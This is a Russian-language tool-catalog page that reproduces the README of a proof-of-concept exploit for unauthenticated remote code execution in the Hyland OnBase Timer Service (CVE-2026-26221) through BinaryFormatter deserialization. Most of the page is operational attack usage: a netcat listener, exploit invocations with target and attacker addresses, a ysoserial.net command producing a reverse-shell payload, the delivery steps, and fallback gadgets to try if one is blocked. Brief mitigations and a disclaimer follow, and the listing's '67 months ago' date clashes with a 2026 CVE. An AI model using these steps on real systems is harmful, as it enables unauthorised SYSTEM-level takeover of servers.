Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-26221-Hyland-OnBase-Timer-Service-Unauthenticated-RCE — Эксплойт-доказательство концепции для неаутентифицированного удалённого выполнения кода в службе таймера Hyland OnBase через десериализацию BinaryFormatter в .NET Remoting, с получением привилегий SYSTEM. | Kitploit
Инструменты/GitHubGitHub/mbanyamer/cve-2026-26221-hyland-onbase-timer-service-unauthenticated-rce
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubmbanyamer/cve-2026-26221-hyland-onbase-timer-service-unauthenticated-rce

CVE-2026-26221-Hyland-OnBase-Timer-Service-Unauthenticated-RCE

Эксплойт-доказательство концепции для неаутентифицированного удалённого выполнения кода в службе таймера Hyland OnBase через десериализацию BinaryFormatter в .NET Remoting, с получением привилегий SYSTEM.

Репозиторий
67 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

📡 Hyland OnBase Timer Service — Неаутентифицированное удалённое выполнение кода (RCE)

Mohammed Idrees Banyamer

Исследователь в области безопасности

Иордания 🇯🇴

Author Role Country Platform Vulnerability CVE CVSS Status


🧨 Обзор

Этот репозиторий содержит Proof‑of‑Concept эксплойт для уязвимости Hyland OnBase Timer Service, позволяющей неаутентифицированному злоумышленнику выполнить произвольный код через небезопасную десериализацию .NET Remoting BinaryFormatter.

Уязвимость позволяет неаутентифицированному злоумышленнику отправить специально сформированный BinaryFormatter-пейлоад на конечную точку Timer Service и выполнить произвольный код с правами NT AUTHORITY\SYSTEM.

  • Продукт: Hyland OnBase Workflow / Workview Timer Service
  • Порт: 8900/TCP
  • Аутентификация: Не требуется
  • Воздействие: Удалённое выполнение кода
  • Привилегии: SYSTEM
  • CVE: CVE‑2026‑26221
  • CVSS: 9.8 (Критический)

⚙️ Технические детали

Timer Service предоставляет конечную точку .NET Remoting:

root@kitploit:~
http://TARGET:8900/TimerServiceAPI.rem

Сервис принимает неаутентифицированные объекты BinaryFormatter. При передаче вредоносной цепочки гаджетов (ysoserial.net) во время десериализации происходит выполнение произвольных команд.


📦 Требования

  • Python 3
  • requests
  • ysoserial.net
  • netcat listener
  • Среда генерации пейлоада для Windows (Windows / Mono / Wine)

Установка зависимости Python:

root@kitploit:~
pip install requests

Скачать ysoserial.net:

root@kitploit:~
git clone https://github.com/pwntester/ysoserial.net

🚀 Использование

1️⃣ Запуск слушателя

root@kitploit:~
nc -lvnp 4444

2️⃣ Запуск эксплойта

root@kitploit:~
python3 exploit.py 192.168.10.50 --lhost 192.168.1.100 --lport 4444

3️⃣ Генерация пейлоада

Скрипт выводит команду ysoserial. Запустите её в другом терминале (Windows / Mono):

root@kitploit:~
ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -c "powershell ..." -o raw > rev_shell.bin

4️⃣ Отправка пейлоада

Нажмите ENTER в терминале эксплойта после генерации пейлоада.

Если система уязвима → установится обратное соединение (reverse shell).


🧪 Пример

root@kitploit:~
python3 exploit.py 10.10.10.123 --lhost 192.168.5.77 --lport 9001

🔧 Параметры

ПараметрОписание
targetIP-адрес или имя хоста цели
--portПорт Timer Service (по умолчанию 8900)
--endpointTimerServiceAPI.rem / TimerServiceEvents.rem
--lhostIP-адрес атакующего
--lportПорт слушателя
--gadgetЦепочка гаджетов ysoserial

🧯 Примечания

  • Эксплойт является слепым

  • Успех = обратный вызов reverse shell

  • Сервис работает с правами SYSTEM

  • Попробуйте альтернативный гаджет, если заблокирован:

    • TextFormattingRunProperties
    • ObjectDataProvider

🛡️ Меры по смягчению

  • Примените патчи из бюллетеня безопасности Hyland OB2025‑03
  • Отключите доступ к .NET Remoting
  • Ограничьте доступ к порту 8900
  • Отслеживайте использование BinaryFormatter

📊 Схема атаки PoC

root@kitploit:~
sequenceDiagram
    participant A as Атакующий
    participant Y as ysoserial.net
    participant T as Целевой OnBase Timer Service
    participant S as Оболочка SYSTEM

    A->>A: Запуск netcat listener
    A->>Y: Генерация BinaryFormatter пейлоада
    Y-->>A: rev_shell.bin
    A->>T: HTTP POST /TimerServiceAPI.rem
    T->>T: BinaryFormatter.Deserialize()
    T->>S: Выполнение цепочки гаджетов
    S-->>A: Обратное соединение reverse shell

⚠️ Отказ от ответственности

Данный эксплойт предоставлен для:

  • Научных исследований в области безопасности
  • Авторизованного тестирования на проникновение
  • Защитной валидации

Несанкционированное использование против систем, которыми вы не владеете или на тестирование которых у вас нет разрешения, является незаконным.


Скачать инструмент